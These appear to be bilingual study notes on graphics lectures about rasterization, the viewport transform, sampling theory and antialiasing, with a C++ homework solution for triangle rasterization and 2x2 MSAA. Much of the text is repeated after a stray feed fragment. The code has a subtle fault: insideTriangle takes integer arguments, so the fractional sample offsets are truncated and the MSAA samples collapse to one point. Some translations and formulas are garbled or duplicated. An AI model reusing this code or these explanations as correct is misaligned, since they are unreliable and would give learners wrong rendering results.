        有时人们更喜欢:垂直视野纵横比(假设对称性,即$l=-r,b=-t$)

    png

    • How to convert from fovY and aspect to $l, r, b, t$?

      如何将垂直视野和纵横比转换为 $l,r,b,t$?

    png

    $$\tan\frac{fovY}{2}=\frac{t}{|n|}$$

    $$aspect=\frac{r}{t}$$

    Canonical Cube to Screen 标准立方体到屏幕

    • What is a screen?

      什么是屏幕?

      • An array of pixels

        像素阵列

      • Size of the array: resolution

        阵列大小:分辨率

      • A typical kind of raster display

        一种典型的光栅显示器

    • Raster == screen in German

      光栅 == 德语的屏幕

      • Rasterize == drawing onto the screen

        光栅化 == 在屏幕上绘制

    • Pixel (FYI, short for “picture element”)

      像素(仅供参考,“图像元素”的缩写)

      • For now: A pixel is a little square with uniform color

        目前:像素是一个颜色均匀的小方块

      • Color is a mixture of (red, green, blue)

        颜色是(绿)的混合物

    png

    • Pixels’ indices are in the form of $(x, y)$, where both $x$ and $y$ are integers.

      像素的索引采用 $(x, y)$ 的形式,其中 $x$ 和 $y$ 都是整数

    • Pixels’ indices are from $(0, 0)$ to $(\mathrm{width} - 1,\mathrm{height} - 1)$

      像素的索引从 $(0, 0)$ 到 $(\mathrm{width} - 1,\mathrm{height} - 1)$

    • Pixel $(x, y)$ is centered at $(x + 0.5, y + 0.5)$

      像素 $(x, y)$ 以 $(x + 0.5, y + 0.5)$ 为中心

    • The screen covers range $(0, 0)$ to $(\mathrm{width},\mathrm{height})$

      屏幕覆盖范围从 $(0, 0)$ 到 $(\mathrm{width},\mathrm{height})$

    • Irrelevant to $z$

      与 $z$ 轴无关

    • Transform in $xy$ plane: $[-1, 1]^2$ to $[0, \mathrm{width}] \times [0, \mathrm{height}]$

      在 $xy$ 平面中变换:$[-1, 1]^2$ 到 $[0, \mathrm{width}] \times [0, \mathrm{height}]$

    • Viewport transform matrix:

      视点转换矩阵:(缩放 + 平移,不管 $z$ 轴)

      $M_{viewport}=\begin{pmatrix}\frac{width}2&0&0&\frac{width}2\0&\frac{height}2&0&\frac{height}2\0&0&1&0\0&0&0&1\end{pmatrix}$

    Drawing Machines 绘制仪器

    • CNC Sharpie Drawing Machine 绘图机
    • Laser Cutters 激光切割机

    Different Raster Displays 不同于光栅显示

    • Oscilloscope

      示波器

    • Television - Raster Display CRT

      电视-光栅显示器 CRT

    • Frame Buffer: Memory for a Raster Display

      帧缓冲区:光栅显示的内存

    • Flat Panel Displays

      平板显示器

    • LCD (Liquid Crystal Display) Pixel

      LCD(液晶显示器)像素

      • Principle: block or transmit light by twisting polarization

        原理:通过扭曲偏振阻挡或透射光

      • Illumination from backlight (e.g. fluorescent or LED)

        背光照明(例如荧光灯或 LED)

      • Intermediate intensity levels by partial twist

        部分扭曲的中等强度水平

    • LED

      阵列显示器

      • Light emitting diode array

        发光二极管阵列

    • Electrophoretic (Electronic Ink) Display 电泳(电子墨水)显示器

      • 刷新率低,不适合看视频

    Rasterization: Drawing to Raster Displays 光栅化:图形到光栅显示

    Triangles - Fundamental Shape Primitives 三角形-基本形状基元

    Why triangles?

    为什么是三角形?

    • Most basic polygon

      最基本的多边形

      • Break up other polygons

        分解其他多边形

    • Unique properties

      独特的特性

      • Guaranteed to be planar

        保证平面

      • Well-defined interior

        明确的内部

      • Well-defined method for interpolating values at vertices over triangle (barycentric interpolation)

        定义良好的三角形顶点插值方法(重心插值)

    png

    • Input: position of triangle vertices projected on screen

      输入:投影在屏幕上的三角形顶点的位置

    • Output: set of pixel values approximating triangle

      输出:近似三角形的像素值集

    A Simple Approach: Sampling 一种简单的方法:采样

    Sampling a Function 对函数进行采样

    Evaluating a function at a point is sampling.

    在一点上评估函数就是采样。
    We can discretize a function by sampling.

    我们可以通过离散函数来采样。

    for (int x = 0; x < xmax; ++x) 
    output[x] = f(x);

    Sampling is a core idea in graphics.

    采样是图形的核心思想。
    We sample time (1D), area (2D), direction (2D), volume (3D) …

    我们采样时间(1D)、面积(2D)、方向(2D)和体积(3D)…

    Define Binary Function 定义二值化函数: inside(tri, x, y)

    $$\left.\texttt{inside (t, x, y) }=\left{\begin{array}{ccc}1&&\text{Point}\ (\mathrm{x,y})\ \text{in thiangle}\ \text{t}\\0&&\text{otherwise}\end{array}\right.\right.$$

    Rasterization = Sampling A 2D Indicator Function 光栅化 = 对 2D 指示器函数进行采样

    for (int x = 0; x < xmax; ++x)
    for (int y = 0; y < ymax; ++y)
    image[x][y] = inside(tri, x + 0.5, y + 0.5);

    通过判断像素点是否在三角形内部来决定上色。

    Inside? Recall: Three Cross Products!

    判断像素点是否在像素点内部可以用向量叉积来表示。

    Edge Cases (Literally) 边缘案例(字面意思)

    Is this sample point covered by triangle 1, triangle 2, or both?

    这个采样点是被三角形 1、三角形 2 覆盖,还是两者都覆盖?

    png

    一般都是自定义。

    Incremental Triangle Traversal (Faster?)

    更快的判定点是否在三角形内部的算法:扫描线算法

    png

    Rasterization on Real Displays 真实显示器上的光栅化

    Real LCD Screen Pixels (Closeup) 真实 LCD 屏幕像素(特写)

    png

    Notice R,G,B pixel geometry! But in this class, we will assume a colored square full-color pixel.

    注意 R,G,B 像素的几何图形(绿色更密集,因为人眼对绿色更敏感)!但在这个课程中,我们将假设一个彩色正方形全色像素(像素为图形的最小单位)。

    Aside: What About Other Display Methods?

    旁白:其他显示方法呢?

    png

    Color print: observe half-tone pattern
    彩色印刷:观察半色调图案

    Assume Display Pixels Emit Square of Light

    假设显示像素发射正方形光

    LCD pixels do not actually emit light in a square of uniform color, but this approximation suffices for our current discussion

    *LCD 像素实际上并不以均匀颜色的正方形发光,但近似值足以应付我们目前的讨论

    Lecture 06 Rasterization 2 (Antialiasing and Z-Buffering)

    上节课得出的三角形,会出现很多锯齿。

    Sampling is Ubiquitous in Computer Graphics 采样在计算机图形学中无处不在

    • Rasterization = Sample 2D Positions 光栅化 = 采样 2D 位置

    • Photograph = Sample Image Sensor Plane 照片 = 样本图像传感器平面

    • Video = Sample Time 视频 = 采样时间

    Sampling Artifacts (Errors / Mistakes / Inaccuracies) in Computer Graphics 计算机图形学中的采样伪像(错误/错误/不准确)

    • Jaggies (Staircase Pattern)(楼梯样式)

    png

    • Moiré Patterns in Imaging 成像中的莫尔条纹

    png

    成像中跳过奇数的行和列
    • Wagon Wheel Illusion (False Motion) 车轮错觉(假动作)
      • 车轮转太快的时候,看起来像反着转。

    • Behind the Aliasing Artifacts 混叠伪影的背后
      • Signals are changing too fast (high frequency), but sampled too slowly 信号变化过快(高频),但采样过慢

    Antialiasing Idea: Blurring (Pre-Filtering) Before Sampling 抗锯齿思想:采样前模糊(预滤波)

    • Rasterization: Point Sampling in Space 栅格化:空间中的点采样

    png

    Note jaggies in rasterized triangle where pixel values are pure red or white

    注意光栅化三角形中像素值为纯红色或白色的锯齿

    Rasterization: Antialiased Sampling 光栅化:抗锯齿采样

    png

    Note antialiased edges in rasterized triangle where pixel values take intermediate values 注意光栅化三角形中的抗锯齿边,其中像素值取中间值

    Antialiasing vs Blurred Aliasing 消除混叠与模糊混叠

    png

    先采样再模糊是不对的!

    But why? 但为什么呢?

    1. Why undersampling introduces aliasing? 为什么欠采样会引入混叠?
    2. Why pre-filtering then sampling can do antialiasing? 为什么先滤波后采样可以做抗锯齿?
      Let’s dig into fundamental reasons 让我们深入探究根本原因
      And look at how to implement antialiased rasterization 看看如何实现抗锯齿光栅化

    Frequency Domain 频域

    Fourier Transform Decomposes A Signal Into Frequencies 傅立叶变换将信号分解为频率(时域与频域相互转换)

    png

    Higher Frequencies Need Faster Sampling 更高的频率需要更快的采样

    png

    • Low-frequency signal: sampled adequately for reasonable reconstruction

      低频信号:充分采样以进行合理重建

    • High-frequency signal is insufficiently sampled: reconstruction incorrectly appears to be from a low frequency signal

      高频信号采样不足:重建错误地显示为来自低频信号

    Undersampling Creates Frequency Aliases 欠采样创建频率混叠

    • High-frequency signal is insufficiently sampled: samples erroneously appear to be from a low-frequency signal
      • 高频信号采样不足:样本错误地看起来来自低频信号
    • Two frequencies that are indistinguishable at a given sampling rate are called “aliases”
      • 在给定的采样率下无法区分的两个频率被称为“别名”

    Filtering = Getting rid of certain frequency contents 过滤 = 去除某些频率内容

    png

    对图像进行傅里叶变换。

    Filter Out Low Frequencies Only (Edges) 仅滤除低频(边缘)

    png

    高通滤波

    Filter Out High Frequencies (Blur) 滤除高频(模糊)

    png

    低通滤波

    Filter Out Low and High Frequencies 滤除低频和高频

    png

    Filter Out Low and High Frequencies 滤除低频和高频

    png

    Filtering = Convolution (= Averaging) 滤波=卷积(=平均)

    卷积定理

    Convolution Theorem

    空间域中的卷积等于频率域中的乘法,反之亦然

    Convolution in the spatial domain is equal to multiplication in the frequency domain, and vice versa

    Option 1: 选项 1:

    • Filter by convolution in the spatial domain

      在空间域中通过卷积进行滤波

    Option 2: 选项 2:

    • Transform to frequency domain (Fourier transform)

      变换到频域(傅立叶变换)

    • Multiply by Fourier transform of convolution kernel

      乘以卷积核的傅立叶变换

    • Multiply by Fourier transform of convolution kernel

      转换回空间域(傅立叶逆变换)

    png

    • Box Function = “Low Pass” Filter

      方框函数 = “低通”滤波器

    • Wider Filter Kernel = Lower Frequencies

      较宽滤波器内核 = 较低频率

    Sampling = Repeating Frequency Contents 采样 = 重复频率内容

    png

    Aliasing = Mixed Frequency Contents 混叠 = 混合频率内容(这是不好的)

    png

    Antialiasing 抗锯齿

    How Can We Reduce Aliasing Error? 如何减少混叠错误?
    Option 1: Increase sampling rate 选项 1:提高采样率

    • Essentially increasing the distance between replicas in the Fourier domain

      本质上增加了傅立叶域中副本之间的距离

    • Higher resolution displays, sensors, framebuffers…

      更高分辨率的显示器、传感器、帧缓冲区…

    • But: costly & may need very high resolution

      但是:成本高昂,可能需要非常高的分辨率

    Option 2: Antialiasing 选项 2:消除混叠

    • Making Fourier contents “narrower” before repeating

      在重复之前使傅立叶内容“变窄”

    • i.e. Filtering out high frequencies before sampling

      即在采样前滤除高频

    Antialiasing = Limiting, then repeating 抗锯齿=限制,然后重复

    png

    Antialiasing By Averaging Values in Pixel Area 通过平均像素区域中的值消除混叠
    Solution: 解决方案:

    • Convolve $f(x,y)$ by a 1-pixel box-blur

      通过1像素框模糊对f(x,y)进行卷积

      • Recall: convolving = filtering = averaging

        回想:卷积 = 滤波 = 平均

    • Then sample at every pixel’s center

      然后在每个像素的中心进行采样

    Antialiasing by Computing Average Pixel Value 通过计算平均像素值消除混叠
    In rasterizing one triangle, the average value inside a pixel area of $f(x,y) = inside(triangle,x,y)$ is equal to the area of the pixel covered by the triangle.

    在光栅化一个三角形时,$f(x,y) = inside(triangle,x,y)$ 的像素区域内的平均值等于三角形覆盖的像素的面积。

    png

    Antialiasing By Supersampling (MSAA) 通过超级采样消除混叠(MSAA)

    Supersampling 超采样
    Approximate the effect of the 1-pixel box filter by sampling multiple locations within a pixel and averaging their values:

    通过对一个像素内的多个位置进行采样并对其值取平均值来近似 1 像素盒滤波器的效果:

    png

    • Take $N\times N$ samples in each pixel.

      在每个像素中取 $N\times N$ 个样本。

    • Average the $N\times N$ samples “inside” each pixel.

      平均每个像素“内部”的 $N\times N$ 个样本。

    • This is the corresponding signal emitted by the display

      最终结果如下:

    png

    Antialiasing Today 现在消除混叠的方法
    No free lunch!

    • What’s the cost of MSAA?

      MSAA的代价是什么?更高的计算量

    Milestones (personal idea)

    • FXAA (Fast Ap proximate AA)

      基于图像后处理的抗锯齿算法

    • TAA (Temporal AA)

      基于时序的抗锯齿算法

    Super resolution / super sampling 超分辨率/超采样

    • From low resolution to high resolution

      从低分辨率到高分辨率

    • Essentially still “not enough samples” problem

      本质上仍然存在“样本不足”的问题

    • DLSS (Deep Learning Super Sampling)

      DLSS(深度学习超级采样)

    HW2

    在上次作业中,虽然我们在屏幕上画出一个线框三角形,但这看起来并不是那么的有趣。所以这一次我们继续推进一步——在屏幕上画出一个实心三角形,换言之,栅格化一个三角形。上一次作业中,在视口变化之后,我们调用了函数rasterize_wireframe(const Triangle& t)。但这一次,你需要自己填写并调用函数 rasterize_triangle(const Triangle& t)
    该函数的内部工作流程如下:

    1. 创建三角形的 2 维 bounding box。

    2. 遍历此 bounding box 内的所有像素(使用其整数索引)。然后,使用像素中心的屏幕空间坐标来检查中心点是否在三角形内。

    3. 如果在内部,则将其位置处的插值深度值 (interpolated depth value) 与深度缓冲区 (depth buffer) 中的相应值进行比较。

    4. 如果当前点更靠近相机,请设置像素颜色并更新深度缓冲区 (depth buffer)。
      你需要修改的函数如下:

    rasterize_triangle(): 执行三角形栅格化算法
    static bool insideTriangle(): 测试点是否在三角形内。你可以修改此函数的定义,这意味着,你可以按照自己的方式更新返回类型或函数参数。
    因为我们只知道三角形三个顶点处的深度值,所以对于三角形内部的像素,我们需要用插值的方法得到其深度值。我们已经为你处理好了这一部分,因为有关这方面的内容尚未在课程中涉及。插值的深度值被储存在变量 z_interpolated 中。


    rasterize_triangle(): 执行三角形栅格化算法

    //Screen space rasterization
    void rst::rasterizer::rasterize_triangle(const Triangle& t) {
    auto v = t.toVector4();
    // TODO : Find out the bounding box of current triangle.
    // iterate through the pixel and find if the current pixel is inside the triangle
    int min_x = INT_MAX;
    int max_x = INT_MIN;
    int min_y = INT_MAX;
    int max_y = INT_MIN;
    for (auto point : v) //获取包围盒边界
    {
    if (point[0] < min_x) min_x = point[0];
    if (point[0] > max_x) max_x = point[0];
    if (point[1] < min_y) min_y = point[1];
    if (point[1] > max_y) max_y = point[1];
    }
    // If so, use the following code to get the interpolated z value.
    //auto[alpha, beta, gamma] = computeBarycentric2D(x, y, t.v);
    //float w_reciprocal = 1.0/(alpha / v[0].w() + beta / v[1].w() + gamma / v[2].w());
    //float z_interpolated = alpha * v[0].z() / v[0].w() + beta * v[1].z() / v[1].w() + gamma * v[2].z() / v[2].w();
    //z_interpolated *= w_reciprocal;

    // TODO : set the current pixel (use the set_pixel function) to the color of the triangle (use getColor function) if it should be painted.
    for (int x = min_x; x <= max_x; ++x)
    {
    for (int y = min_y; y <= max_y; ++y)
    {
    if (insideTriangle(x + 0.5, y + 0.5, t.v))
    {
    auto[alpha, beta, gamma] = computeBarycentric2D(x, y, t.v);
    float w_reciprocal = 1.0 / (alpha / v[0].w() + beta / v[1].w() + gamma / v[2].w());
    float z_interpolated = alpha * v[0].z() / v[0].w() + beta * v[1].z() / v[1].w() + gamma * v[2].z() / v[2].w();
    z_interpolated *= w_reciprocal;

    if (z_interpolated < depth_buf[get_index(x, y)])
    {
    depth_buf[get_index(x, y)] = z_interpolated;
    Eigen::Vector3f point = Eigen::Vector3f(x, y, z_interpolated);
    set_pixel(point, t.getColor());
    }
    }
    }
    }
    }

    static bool insideTriangle(): 测试点是否在三角形内

    要使用向量的叉乘来判断一个点是否在三角形内部,可以按照以下步骤进行:

    1. 假设有一个三角形,其中包含三个顶点 A、B 和 C。
    2. 给定一个待检测的点 P。
    3. 使用向量 AB 和向量 AP 进行叉乘,并计算得到叉乘结果 cross1。
    4. 使用向量 BC 和向量 BP 进行叉乘,并计算得到叉乘结果 cross2。
    5. 使用向量 CA 和向量 CP 进行叉乘,并计算得到叉乘结果 cross3。
    6. 检查 cross1、cross2 和 cross3 的符号。如果它们都具有相同的符号(正数或负数),则点 P 在三角形的内部。否则,点 P 不在三角形的内部。

    具体来说,可以使用右手法则来确定向量的方向。对于跨越的两条边(例如 AB 和 AP),将右手的拇指指向第一条边(AB),食指指向第二条边(AP)。如果中指指向了背离三角形平面的方向,则叉乘结果为负数。如果中指指向了朝向三角形平面的方向,则叉乘结果为正数。

    这种方法基于向量的叉乘性质,通过检查叉乘结果的符号来判断点 P 是否在三角形内部。如果叉乘结果都具有相同的符号,那么点 P 在三角形的同一侧,即在三角形内部。如果叉乘结果具有不同的符号,那么点 P 在三角形的两侧,即不在三角形内部。

    请注意,这种方法只适用于点和三角形都位于同一平面上的情况。

    static bool insideTriangle(int x, int y, const Vector3f* _v)
    {
    // TODO : Implement this function to check if the point (x, y) is inside the triangle represented by _v[0], _v[1], _v[2]
    Eigen::Vector3f AP(x - _v[0][0], y - _v[0][1], 0);
    Eigen::Vector3f BP(x - _v[1][0], y - _v[1][1], 0);
    Eigen::Vector3f CP(x - _v[2][0], y - _v[2][1], 0);
    Eigen::Vector3f AB(_v[1][0] - _v[0][0], _v[1][1] - _v[0][1], 0);
    Eigen::Vector3f BC(_v[2][0] - _v[1][0], _v[2][1] - _v[1][1], 0);
    Eigen::Vector3f CA(_v[0][0] - _v[2][0], _v[0][1] - _v[2][1], 0);
    return AB.cross(AP).z() * BC.cross(BP).z() >= 0 && BC.cross(BP).z() * CA.cross(CP).z() >= 0;
    }

    $2\times2$ MSAA:

    //Screen space rasterization
    void rst::rasterizer::rasterize_triangle(const Triangle& t) {
    auto v = t.toVector4();

    // TODO : Find out the bounding box of current triangle.
    // iterate through the pixel and find if the current pixel is inside the triangle
    int min_x = INT_MAX;
    int max_x = INT_MIN;
    int min_y = INT_MAX;
    int max_y = INT_MIN;
    for (auto point : v) //获取包围盒边界
    {
    if (point[0] < min_x) min_x = point[0];
    if (point[0] > max_x) max_x = point[0];
    if (point[1] < min_y) min_y = point[1];
    if (point[1] > max_y) max_y = point[1];
    }
    // If so, use the following code to get the interpolated z value.
    //auto[alpha, beta, gamma] = computeBarycentric2D(x, y, t.v);
    //float w_reciprocal = 1.0/(alpha / v[0].w() + beta / v[1].w() + gamma / v[2].w());
    //float z_interpolated = alpha * v[0].z() / v[0].w() + beta * v[1].z() / v[1].w() + gamma * v[2].z() / v[2].w();
    //z_interpolated *= w_reciprocal;

    // TODO : set the current pixel (use the set_pixel function) to the color of the triangle (use getColor function) if it should be painted.
    for (int x = min_x; x <= max_x; ++x)
    {
    for (int y = min_y; y <= max_y; ++y)
    {
    float rate = 0.0f;
    if (insideTriangle(x + 0.25, y + 0.25, t.v))
    rate += 0.25f;
    if (insideTriangle(x + 0.75, y + 0.75, t.v))
    rate += 0.25f;
    if (insideTriangle(x + 0.75, y + 0.25, t.v))
    rate += 0.25f;
    if (insideTriangle(x + 0.25, y + 0.75, t.v))
    rate += 0.25f;
    if (rate > 0.0f)
    {
    auto[alpha, beta, gamma] = computeBarycentric2D(x, y, t.v);
    float w_reciprocal = 1.0 / (alpha / v[0].w() + beta / v[1].w() + gamma / v[2].w());
    float z_interpolated = alpha * v[0].z() / v[0].w() + beta * v[1].z() / v[1].w() + gamma * v[2].z() / v[2].w();
    z_interpolated *= w_reciprocal;

    if (z_interpolated < depth_buf[get_index(x, y)])
    {
    depth_buf[get_index(x, y)] = z_interpolated;
    Eigen::Vector3f point = Eigen::Vector3f(x, y, z_interpolated);
    set_pixel(point, rate * t.getColor());
    }
    }
    }
    }
    }
    ]]>
    + 资源

    课程

    Lecture 05 Rasterization 1 (Triangles)

    Perspective Projection 透视投影

    • What’s near plane’s $l, r, b, t$ then?

      那么,near 平面的 $l,r,b,t$ 是什么?

      • If explicitly specified, good

        如果有明确规定,这很好

      • Sometimes people prefer: vertical field-of-view (fovY) and aspect ratio (assume symmetry i.e. $l = -r, b = -t$)

        有时人们更喜欢:垂直视野纵横比(假设对称性,即$l=-r,b=-t$)

    png

    • How to convert from fovY and aspect to $l, r, b, t$?

      如何将垂直视野和纵横比转换为 $l,r,b,t$?

    png

    $$\tan\frac{fovY}{2}=\frac{t}{|n|}$$

    $$aspect=\frac{r}{t}$$

    Canonical Cube to Screen 标准立方体到屏幕

    • What is a screen?

      什么是屏幕?

      • An array of pixels

        像素阵列

      • Size of the array: resolution

        阵列大小:分辨率

      • A typical kind of raster display

        一种典型的光栅显示器

    • Raster == screen in German

      光栅 == 德语的屏幕

      • Rasterize == drawing onto the screen

        光栅化 == 在屏幕上绘制

    • Pixel (FYI, short for “picture element”)

      像素(仅供参考,“图像元素”的缩写)

      • For now: A pixel is a little square with uniform color

        目前:像素是一个颜色均匀的小方块

      • Color is a mixture of (red, green, blue)

        颜色是(绿)的混合物

    png

    • Pixels’ indices are in the form of $(x, y)$, where both $x$ and $y$ are integers.

      像素的索引采用 $(x, y)$ 的形式,其中 $x$ 和 $y$ 都是整数

    • Pixels’ indices are from $(0, 0)$ to $(\mathrm{width} - 1,\mathrm{height} - 1)$

      像素的索引从 $(0, 0)$ 到 $(\mathrm{width} - 1,\mathrm{height} - 1)$

    • Pixel $(x, y)$ is centered at $(x + 0.5, y + 0.5)$

      像素 $(x, y)$ 以 $(x + 0.5, y + 0.5)$ 为中心

    • The screen covers range $(0, 0)$ to $(\mathrm{width},\mathrm{height})$

      屏幕覆盖范围从 $(0, 0)$ 到 $(\mathrm{width},\mathrm{height})$

    • Irrelevant to $z$

      与 $z$ 轴无关

    • Transform in $xy$ plane: $[-1, 1]^2$ to $[0, \mathrm{width}] \times [0, \mathrm{height}]$

      在 $xy$ 平面中变换:$[-1, 1]^2$ 到 $[0, \mathrm{width}] \times [0, \mathrm{height}]$

    • Viewport transform matrix:

      视点转换矩阵:(缩放 + 平移,不管 $z$ 轴)

      $M_{viewport}=\begin{pmatrix}\frac{width}2&0&0&\frac{width}2\0&\frac{height}2&0&\frac{height}2\0&0&1&0\0&0&0&1\end{pmatrix}$

    Drawing Machines 绘制仪器

    • CNC Sharpie Drawing Machine 绘图机
    • Laser Cutters 激光切割机

    Different Raster Displays 不同于光栅显示

    • Oscilloscope

      示波器

    • Television - Raster Display CRT

      电视-光栅显示器 CRT

    • Frame Buffer: Memory for a Raster Display

      帧缓冲区:光栅显示的内存

    • Flat Panel Displays

      平板显示器

    • LCD (Liquid Crystal Display) Pixel

      LCD(液晶显示器)像素

      • Principle: block or transmit light by twisting polarization

        原理:通过扭曲偏振阻挡或透射光

      • Illumination from backlight (e.g. fluorescent or LED)

        背光照明(例如荧光灯或 LED)

      • Intermediate intensity levels by partial twist

        部分扭曲的中等强度水平

    • LED

      阵列显示器

      • Light emitting diode array

        发光二极管阵列

    • Electrophoretic (Electronic Ink) Display 电泳(电子墨水)显示器

      • 刷新率低,不适合看视频

    Rasterization: Drawing to Raster Displays 光栅化:图形到光栅显示

    Triangles - Fundamental Shape Primitives 三角形-基本形状基元

    Why triangles?

    为什么是三角形?

    • Most basic polygon

      最基本的多边形

      • Break up other polygons

        分解其他多边形

    • Unique properties

      独特的特性

      • Guaranteed to be planar

        保证平面

      • Well-defined interior

        明确的内部

      • Well-defined method for interpolating values at vertices over triangle (barycentric interpolation)

        定义良好的三角形顶点插值方法(重心插值)

    png

    • Input: position of triangle vertices projected on screen

      输入:投影在屏幕上的三角形顶点的位置

    • Output: set of pixel values approximating triangle

      输出:近似三角形的像素值集

    A Simple Approach: Sampling 一种简单的方法:采样

    Sampling a Function 对函数进行采样

    Evaluating a function at a point is sampling.

    在一点上评估函数就是采样。
    We can discretize a function by sampling.

    我们可以通过离散函数来采样。

    1
    2
    for (int x = 0; x < xmax; ++x) 
    output[x] = f(x);

    Sampling is a core idea in graphics.

    采样是图形的核心思想。
    We sample time (1D), area (2D), direction (2D), volume (3D) …

    我们采样时间(1D)、面积(2D)、方向(2D)和体积(3D)…

    Define Binary Function 定义二值化函数: inside(tri, x, y)

    $$\left.\texttt{inside (t, x, y) }=\left{\begin{array}{ccc}1&&\text{Point}\ (\mathrm{x,y})\ \text{in thiangle}\ \text{t}\\0&&\text{otherwise}\end{array}\right.\right.$$

    Rasterization = Sampling A 2D Indicator Function 光栅化 = 对 2D 指示器函数进行采样

    1
    2
    3
    for (int x = 0; x < xmax; ++x)
    for (int y = 0; y < ymax; ++y)
    image[x][y] = inside(tri, x + 0.5, y + 0.5);

    通过判断像素点是否在三角形内部来决定上色。

    Inside? Recall: Three Cross Products!

    判断像素点是否在像素点内部可以用向量叉积来表示。

    Edge Cases (Literally) 边缘案例(字面意思)

    Is this sample point covered by triangle 1, triangle 2, or both?

    这个采样点是被三角形 1、三角形 2 覆盖,还是两者都覆盖?

    png

    一般都是自定义。

    Incremental Triangle Traversal (Faster?)

    更快的判定点是否在三角形内部的算法:扫描线算法

    png

    Rasterization on Real Displays 真实显示器上的光栅化

    Real LCD Screen Pixels (Closeup) 真实 LCD 屏幕像素(特写)

    png

    Notice R,G,B pixel geometry! But in this class, we will assume a colored square full-color pixel.

    注意 R,G,B 像素的几何图形(绿色更密集,因为人眼对绿色更敏感)!但在这个课程中,我们将假设一个彩色正方形全色像素(像素为图形的最小单位)。

    Aside: What About Other Display Methods?

    旁白:其他显示方法呢?

    png

    Color print: observe half-tone pattern
    彩色印刷:观察半色调图案

    Assume Display Pixels Emit Square of Light

    假设显示像素发射正方形光

    LCD pixels do not actually emit light in a square of uniform color, but this approximation suffices for our current discussion

    *LCD 像素实际上并不以均匀颜色的正方形发光,但近似值足以应付我们目前的讨论

    Lecture 06 Rasterization 2 (Antialiasing and Z-Buffering)

    上节课得出的三角形,会出现很多锯齿。

    Sampling is Ubiquitous in Computer Graphics 采样在计算机图形学中无处不在

    • Rasterization = Sample 2D Positions 光栅化 = 采样 2D 位置

    • Photograph = Sample Image Sensor Plane 照片 = 样本图像传感器平面

    • Video = Sample Time 视频 = 采样时间

    Sampling Artifacts (Errors / Mistakes / Inaccuracies) in Computer Graphics 计算机图形学中的采样伪像(错误/错误/不准确)

    • Jaggies (Staircase Pattern)(楼梯样式)

    png

    • Moiré Patterns in Imaging 成像中的莫尔条纹

    png

    成像中跳过奇数的行和列
    • Wagon Wheel Illusion (False Motion) 车轮错觉(假动作)
      • 车轮转太快的时候,看起来像反着转。

    • Behind the Aliasing Artifacts 混叠伪影的背后
      • Signals are changing too fast (high frequency), but sampled too slowly 信号变化过快(高频),但采样过慢

    Antialiasing Idea: Blurring (Pre-Filtering) Before Sampling 抗锯齿思想:采样前模糊(预滤波)

    • Rasterization: Point Sampling in Space 栅格化:空间中的点采样

    png

    Note jaggies in rasterized triangle where pixel values are pure red or white

    注意光栅化三角形中像素值为纯红色或白色的锯齿

    Rasterization: Antialiased Sampling 光栅化:抗锯齿采样

    png

    Note antialiased edges in rasterized triangle where pixel values take intermediate values 注意光栅化三角形中的抗锯齿边,其中像素值取中间值

    Antialiasing vs Blurred Aliasing 消除混叠与模糊混叠

    png

    先采样再模糊是不对的!

    But why? 但为什么呢?

    1. Why undersampling introduces aliasing? 为什么欠采样会引入混叠?
    2. Why pre-filtering then sampling can do antialiasing? 为什么先滤波后采样可以做抗锯齿?
      Let’s dig into fundamental reasons 让我们深入探究根本原因
      And look at how to implement antialiased rasterization 看看如何实现抗锯齿光栅化

    Frequency Domain 频域

    Fourier Transform Decomposes A Signal Into Frequencies 傅立叶变换将信号分解为频率(时域与频域相互转换)

    png

    Higher Frequencies Need Faster Sampling 更高的频率需要更快的采样

    png

    • Low-frequency signal: sampled adequately for reasonable reconstruction

      低频信号:充分采样以进行合理重建

    • High-frequency signal is insufficiently sampled: reconstruction incorrectly appears to be from a low frequency signal

      高频信号采样不足:重建错误地显示为来自低频信号

    Undersampling Creates Frequency Aliases 欠采样创建频率混叠

    • High-frequency signal is insufficiently sampled: samples erroneously appear to be from a low-frequency signal
      • 高频信号采样不足:样本错误地看起来来自低频信号
    • Two frequencies that are indistinguishable at a given sampling rate are called “aliases”
      • 在给定的采样率下无法区分的两个频率被称为“别名”

    Filtering = Getting rid of certain frequency contents 过滤 = 去除某些频率内容

    png

    对图像进行傅里叶变换。

    Filter Out Low Frequencies Only (Edges) 仅滤除低频(边缘)

    png

    高通滤波

    Filter Out High Frequencies (Blur) 滤除高频(模糊)

    png

    低通滤波

    Filter Out Low and High Frequencies 滤除低频和高频

    png

    Filter Out Low and High Frequencies 滤除低频和高频

    png

    Filtering = Convolution (= Averaging) 滤波=卷积(=平均)

    卷积定理

    Convolution Theorem

    空间域中的卷积等于频率域中的乘法,反之亦然

    Convolution in the spatial domain is equal to multiplication in the frequency domain, and vice versa

    Option 1: 选项 1:

    • Filter by convolution in the spatial domain

      在空间域中通过卷积进行滤波

    Option 2: 选项 2:

    • Transform to frequency domain (Fourier transform)

      变换到频域(傅立叶变换)

    • Multiply by Fourier transform of convolution kernel

      乘以卷积核的傅立叶变换

    • Multiply by Fourier transform of convolution kernel

      转换回空间域(傅立叶逆变换)

    png

    • Box Function = “Low Pass” Filter

      方框函数 = “低通”滤波器

    • Wider Filter Kernel = Lower Frequencies

      较宽滤波器内核 = 较低频率

    Sampling = Repeating Frequency Contents 采样 = 重复频率内容

    png

    Aliasing = Mixed Frequency Contents 混叠 = 混合频率内容(这是不好的)

    png

    Antialiasing 抗锯齿

    How Can We Reduce Aliasing Error? 如何减少混叠错误?
    Option 1: Increase sampling rate 选项 1:提高采样率

    • Essentially increasing the distance between replicas in the Fourier domain

      本质上增加了傅立叶域中副本之间的距离

    • Higher resolution displays, sensors, framebuffers…

      更高分辨率的显示器、传感器、帧缓冲区…

    • But: costly & may need very high resolution

      但是:成本高昂,可能需要非常高的分辨率

    Option 2: Antialiasing 选项 2:消除混叠

    • Making Fourier contents “narrower” before repeating

      在重复之前使傅立叶内容“变窄”

    • i.e. Filtering out high frequencies before sampling

      即在采样前滤除高频

    Antialiasing = Limiting, then repeating 抗锯齿=限制,然后重复

    png

    Antialiasing By Averaging Values in Pixel Area 通过平均像素区域中的值消除混叠
    Solution: 解决方案:

    • Convolve $f(x,y)$ by a 1-pixel box-blur

      通过1像素框模糊对f(x,y)进行卷积

      • Recall: convolving = filtering = averaging

        回想:卷积 = 滤波 = 平均

    • Then sample at every pixel’s center

      然后在每个像素的中心进行采样

    Antialiasing by Computing Average Pixel Value 通过计算平均像素值消除混叠
    In rasterizing one triangle, the average value inside a pixel area of $f(x,y) = inside(triangle,x,y)$ is equal to the area of the pixel covered by the triangle.

    在光栅化一个三角形时,$f(x,y) = inside(triangle,x,y)$ 的像素区域内的平均值等于三角形覆盖的像素的面积。

    png

